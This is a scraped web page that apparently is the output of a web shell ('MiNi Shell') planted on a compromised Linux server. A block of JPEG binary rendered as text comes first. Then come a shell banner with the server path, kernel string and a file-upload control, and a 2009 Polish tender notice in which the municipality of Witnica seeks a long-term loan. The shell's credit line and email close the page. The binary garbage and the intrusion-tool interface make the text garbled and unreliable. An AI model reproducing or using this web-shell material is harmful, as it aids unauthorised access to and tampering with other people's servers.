JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353786-N-2009.html

<p class="kh_header"><b>Witnica: Udzielenie kredytu długoterminowego w wysokości 10.820.907 zł, na sfinansowanie planowane deficytu budżetowego, związanego z finansowaniem inwestycji w Gminie Witnica w latach 2009-2012 r.</b><br>
<b>Numer ogłoszenia: 353786 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Witnica , ul. Krajowej Rady Narodowej 6, 66-460 Witnica, woj. lubuskie, tel. 095 7216446, faks 095 7515218.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.witnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego w wysokości 10.820.907 zł, na sfinansowanie planowane deficytu budżetowego, związanego z finansowaniem inwestycji w Gminie Witnica w latach 2009-2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest udzielenie kredytu długoterminowego w wysokości 10.820.907 zł na sfinansowanie planowanego deficytu budżetowego, związanego z finansowaniem inwestycji w Gminie Witnica w latach 2009-2012.
2. Kredyt jest zaciągany na podstawie Uchwały Nr XLI.254.2009 Rady Miejskiej w  Witnicy z dnia 4 sierpnia 2009 r. w sprawie zaciągnięcia przez Gminę Witnica kredytu długoterminowego na sfinansowanie planowanego deficytu budżetu Miasta i Gminy Witnica w latach 2009-2012.
3.Szczegółowe warunki zamówienia:
3.1.Wysokość udzielanego kredytu - do kwoty 10.820.907 PLN.
3.2.Spłata kredytu - w miesięcznych ratach wg harmonogramu - stanowiącego Załącznik Nr 5 B, począwszy od miesiąca stycznia 2010 r. roku do końca grudnia 2024 r. 
3.3.Możliwość wcześniejszej spłaty części lub całości kredytu bez dodatkowych opłat, po zawiadomieniu Banku o planowanej przedterminowej spłacie z 7 - dniowym wyprzedzeniem.
3.4.W przypadku wcześniejszej spłaty części lub całości kapitału - odsetki płatne od faktycznego zadłużenia. 
3.5.Spłata odsetek obejmuje okres jednego miesiąca. 
3.6.Spłata odsetek w okresach miesięcznych - do ostatniego dnia każdego miesiąca, począwszy od następnego miesiąca po uruchomieniu transzy, na podstawie zawiadomień Banku o ich wysokości, co najmniej 7 dni przed terminem ich wymagalności, faxem bądź drogą elektroniczną.
3.7.Zabezpieczenie kredytu - weksel In blanco.
3.8.Rozliczenia między Zamawiającym a bankiem dokonywane będą w złotych polskich (PLN).
3.9.Kredyt oprocentowany wg stopy redyskonta weksli powiększonej o  marżę banku, która przez cały okres kredytowania nie może być zwiększona.
3.10.Środki z kredytu, zostaną postawione, do dyspozycji Zamawiającego w terminie 7 dni od dnia podpisania umowy. 
3.11.Zamawiający zastrzega sobie prawo uruchomienia środków kredytowych w terminie najpóźniej do końca każdego roku, w którym uruchamiane będą poszczególne transze (2009-2012), natomiast określenie transz wypłat kredytu oraz terminów postawienia ich do dyspozycji Zamawiającego następować będzie poprzez złożenie przez Zamawiającego zapotrzebowania na środki, na 7 dni roboczych przed ich uruchomieniem. 
3.12.Uruchomienie kredytu może następować tylko w dzień roboczy, za który przyjmuje się dzień, w którym banki dokonują zwykłych czynności w kraju Zamawiającego i Banku. 
3.13.Wypłata środków z kredytu będzie następowała na rachunek wskazany przez Zamawiającego.
3.14.Bank będzie naliczał odsetki wyłącznie od wypłaconych transz kredytu.
3.15.Bank nie będzie naliczał odsetek od kwoty niewykorzystanego kredytu.
3.16.Zamawiający zastrzega sobie prawo odstąpienia od uruchomienia kredytu lub skorzystania z jego części bez podania przyczyny oraz bez ponoszenia dodatkowych opłat. 
3.17.Zamawiający zastrzega sobie prawo do wyboru zadań inwestycyjnych wymienionych w załączniku Nr 5A do SIWZ, które będą finansowane za pomocą udzielonego kredytu, będącego przedmiotem zamówienia. Zamawiający informuje, że po podpisaniu umów na wykonanie zadań inwestycyjnych realizowanych w ramach kredytu, będzie informował na bieżąco bank o terminach i kwotach poprzetargowych, dotyczących udzielonej pomocy kredytowej. 
3.18.Kredyt zostanie udzielony w złotych polskich (PLN).
3.19.Zamawiający nie dopuszcza możliwości pobierania innych (dodatkowych) opłat związanych z usługą udzielonego kredytu, z wyjątkiem prowizji w wysokości nie większej niż 0,5% wartości kredytu opisanego w Rozdz. III pkt.3 ppkt. 1.
4.Wykonawca zapłaci kary umowne:
4.1.Za zwłokę w udzieleniu (wypłaceniu) transzy - w wysokości 0,05% wartości transzy za każdy dzień zwłoki. 
4.2.Za odstąpienie od umowy przez Wykonawcę z przyczyn, za które ponosi odpowiedzialność Wykonawca, w wysokości 10% sumy zamówienia.
5.Informacja dotycząca sytuacji finansowej Gminy dostępna jest na stronie internetowej Gminy Witnica tj.: www.bip.witnica.pl - zamówienia publiczne -udzielenie kredytu długoterminowego, w której to zakładce są udostępnione linki do dokumentów wymienionych w Załączniku Nr 6 do SIWZ.
6.Istotne postanowienia umowy w sprawie zamówienia publicznego - stanowią Załączniki Nr 5 A i 5 B do SIWZ.
7.Wykonawca wskaże imiennie pracownika do obsługi Zamawiającego w zakresie realizacji przedmiotowego zamówienia.
8.Zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19  grudnia 2007 r. w sprawie średniego kursu złotego w stosunku do euro stanowiącego podstawę przeliczania wartości zamówień publicznych (Dz. U. Nr 241, poz. 1763) - średni kurs złotego w stosunku do EURO stanowiący podstawę przeliczania wartości zamówień publicznych wynosi 3,8771 zł. 
9.Klasyfikacja przedmiotu zamówienia wg Wspólnego Słownika Zamówień (CPV):  66.11.30.00-5 - Usługi udzielania kredytu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2024.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wykonawca jest zobowiązany wraz ze złożeniem oferty do wniesienia wadium w wysokości 100.000,00 złotych (słownie: sto tysięcy złotych 00/100), zgodnie z art. 45 ust. 6 ustawy pzp w jednej lub kilku następujących formach:
1.1.pieniądzu;
1.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
1.3.gwarancjach bankowych,
1.4.gwarancjach ubezpieczeniowych;
1.5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275);
2.Wadium zgodnie z art. 45. Ust. 3 ustawy pzp musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do 30 listopada 2009 r., do godz. 09:00.

Uwaga:

3.W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, powinny one być sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
3.1.nazwa dającego zlecenie udzielenia gwarancji lub poręczenia (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib;
3.2.określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem;
3.3.kwotę gwarancji lub poręczenia;
3.4.termin ważności gwarancji lub poręczenia;
3.5.zobowiązanie gwaranta do bezwarunkowego i nieodwołalnego zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:
a)Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy pzp nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
b)Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach określonych w ofercie,
c)Wykonawca nie wniósł zabezpieczenia należytego wykonania umowy,
d)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
4.Wniesione wadium w formie poręczenia lub gwarancji należy: kopię dokumentu zszyć razem z ofertą, natomiast oryginał dołączyć do oferty osobno w  koszulce, nie zszywając z ofertą.
5.Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli do podanego w rozdz. XXI pkt 2. terminu znajdzie się ono na rachunku bankowym Zamawiającego.
6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto GMINY WITNICA: 
62 8355 0009 0114 4848 2000 0004  z dopiskiem:  Wadium - udzielenie kredytu - stopa redyskonta weksli;
7.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
8.Zamawiający zwraca niezwłocznie wadium jeżeli:
8.1.upłynął termin zawiązania ofertą;
8.2.zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
8.3.zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia
9.Z zastrzeżeniem rozdz. XXI pkt. 3 SIWZ Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
9.1.który wycofał ofertę przed upływem terminu składania ofert;
9.2.który został wykluczony z postępowania;
9.3.którego oferta została odrzucona
10.Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 2 pkt 2 i 3 ustawy pzp, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. W przypadku tym Wykonawcy winni będą wnieść wadium w terminie określonym przez Zamawiającego;
11.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

Uwaga:

12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w pkt. 25 ust. 1 ustawy pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
13.1.odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, albo
13.2.nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, albo
13.3.zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W przetargu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 ust. 1 i 2 ustawy pzp, spełniający warunki zawarte w art.. 22 ust. 1 pkt. 1-4 ustawy pzp. 
2.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdz. VI pkt. 1 ppkt 2 - 9 SIWZ.
3.Nie spełnienie chociażby jednego z warunków pkt. 1 w rozdz. V SIWZ skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Dokumenty i oświadczenia wymagane od Wykonawcy ubiegającego się o zamówienie:
1.1.dowód wniesienia wadium;
1.2.wypełniony formularz oferty wg Załącznika Nr 1 do SIWZ;
1.3.oświadczenie w trybie art. 44 ustawy pzp o spełnieniu warunków art. 22 ust. 1 pkt. 1-4 ustawy pzp wg Załącznika Nr 2 do SIWZ;
1.4.oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy pzp wg Załącznika Nr 3 do SIWZ;
1.5.aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli przepisy odrębne wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż przed 6 miesiącami przed terminem składania ofert,
1.6.zezwolenie Komisji Nadzoru Bankowego na prowadzenie działalności przez bank - Wykonawcę w zakresie objętym niniejszym zamówieniem, na potwierdzenie spełnienia warunku określonego w rozdz. V pkt. 1 ppkt. 1 SIWZ.
1.7.zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.8.aktualna informacja z Krajowego Rejestru Karnego - zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust.1 pkt 4 - 9 ustawy pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.9.Wypełniona Tabela Obliczenia Ceny Zamówienia wg Załącznika Nr 4 do SIWZ.
1.10.Zaakceptowane istotne postanowienia umowy wg Załączników od Nr 5 A do 5 B.
1.11.Pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile oferty składa pełnomocnik Wykonawcy.
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w :
2.1.Rozdz.. VI pkt. 1 ppkt. 5 i 8 SIWZ, składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2.2.Rozdz. VI pkt. 1 ppkt. 7 SIWZ, składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert, potwierdzające odpowiednio, że:
a)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne,
b)uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
3.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdz. VI pkt. 2 SIWZ, zastępuje się je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub  gospodarczego, odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4.Wymienione w rozdz. VI SIWZ dokumenty i oświadczenia muszą być załączone do oferty.
5.Składane dokumenty muszą być przedstawione w formie oryginału, za wyjątkiem dokumentów, o których mowa w rozdz. VI pkt. 1 ppkt. 5, 6 i 8 SIWZ, które mogą być przedstawione w formie kserokopii poświadczonej na każdej stronie, za zgodność z oryginałem przez Wykonawcę lub pełnomocnika Wykonawcy.
6.Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
7.Zgodnie z art. 26 ust. 3 ustawy pzp Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu przez Zamawiającego, którzy nie złożyli pełnomocnictw, którzy złożyli wymagane dokumenty i oświadczenia zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta Wnioskodawcy podlegać będzie odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie dokumenty i oświadczenia powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
8.Z treści dokumentów i oświadczeń, o których mowa w rozdz. VI pkt. 1 i 3 SIWZ musi wynikać jednoznacznie, iż postawione przez Zamawiającego warunki i wymagania zostały spełnione..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.witnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta i Gminy w Witnicy ul. KRN 6, 66-460  Witnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2009 godzina 10:00, miejsce: Urzad Miasta i Gminy w Witnicy ul. KRN 6, 66-460  Witnica, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com